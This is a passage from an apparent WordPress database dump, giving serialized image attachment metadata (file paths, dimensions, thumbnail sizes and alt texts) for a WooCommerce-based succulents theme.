:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(239,3449,'_wp_attachment_image_alt','o'),(240,3222,'_wp_attached_file','2018/02/h3-slide1-graphic1.png'),(241,3222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:286;s:6:\"height\";i:168;s:4:\"file\";s:30:\"2018/02/h3-slide1-graphic1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(242,2055,'_wp_attachment_image_alt','a'),(243,3451,'_wp_attached_file','2018/02/landing-slide2-graphic5.png'),(244,3451,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:194;s:6:\"height\";i:183;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic5.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(245,3222,'_wp_attachment_image_alt','o'),(246,3451,'_wp_attachment_image_alt','o'),(247,2061,'_wp_attached_file','2018/02/team-img-1.jpg'),(248,2061,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1101;s:6:\"height\";i:553;s:4:\"file\";s:22:\"2018/02/team-img-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"team-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"team-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"team-img-1-600x301.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"team-img-1-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"team-img-1-1024x514.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"team-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"team-img-1-768x386.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"team-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"team-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"team-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"team-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"team-img-1-550x553.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"team-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"team-img-1-600x301.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"team-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(249,3223,'_wp_attached_file','2018/02/h3-slide1-graphic7.png'),(250,3223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:851;s:6:\"height\";i:722;s:4:\"file\";s:30:\"2018/02/h3-slide1-graphic7.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic7-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-600x509.png\";s:5:\"width\";i:600;s:6:\"height\";i:509;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-300x255.png\";s:5:\"width\";i:300;s:6:\"height\";i:255;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-768x652.png\";s:5:\"width\";i:768;s:6:\"height\";i:652;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-851x550.png\";s:5:\"width\";i:851;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-550x722.png\";s:5:\"width\";i:550;s:6:\"height\";i:722;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h3-slide1-graphic7-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-600x509.png\";s:5:\"width\";i:600;s:6:\"height\";i:509;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(251,1128,'_wp_attachment_image_alt','a'),(252,3452,'_wp_attached_file','2018/02/landing-slide2-graphic6.png'),(253,3452,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:127;s:6:\"height\";i:77;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic6.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"landing-slide2-graphic6-100x77.png\";s:5:\"width\";i:100;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"landing-slide2-graphic6-100x77.png\";s:5:\"width\";i:100;s:6:\"height\";i:77;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(254,3452,'_wp_attachment_image_alt','o'),(255,645,'_wp_attachment_image_alt','a'),(256,1129,'_wp_attached_file','2018/01/product12-gallery2.jpg'),(257,1129,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product12-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product12-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product12-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(258,3453,'_wp_attached_file','2018/02/landing-slide2-graphic7.png'),(259,3453,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:169;s:6:\"height\";i:146;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic7.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic7-150x146.png\";s:5:\"width\";i:150;s:6:\"height\";i:146;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(260,670,'_wp_attached_file','2018/01/working-with-dietitian-2.jpg'),(261,670,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1297;s:6:\"height\";i:867;s:4:\"file\";s:36:\"2018/01/working-with-dietitian-2.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"working-with-dietitian-2-1024x685.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:685;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:37:\"working-with-dietitian-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:37:\"working-with-dietitian-2-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"working-with-dietitian-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"working-with-dietitian-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(262,3453,'_wp_attachment_image_alt','o'),(263,1457,'_wp_attachment_image_alt','a'),(264,3454,'_wp_attached_file','2018/02/landing-slide2-graphic8.png'),(265,3454,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:329;s:6:\"height\";i:187;s:4:\"file\";s:35:\"2018/02/landing-slide2-graphic8.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic8-300x187.png\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic8-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic8-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic8-300x187.png\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"landing-slide2-graphic8-300x187.png\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"landing-slide2-graphic8-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(266,1458,'_wp_attached_file','2018/01/big-gallery-img-3.jpg'),(267,1458,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1305;s:6:\"height\";i:867;s:4:\"file\";s:29:\"2018/01/big-gallery-img-3.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"big-gallery-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-3-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-3-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-3-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"big-gallery-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(268,1129,'_wp_attachment_image_alt','a'),(269,1130,'_wp_attached_file','2018/01/product12-gallery3.jpg'),(270,1130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product12-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product12-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product12-gallery3-550x600.jpg\"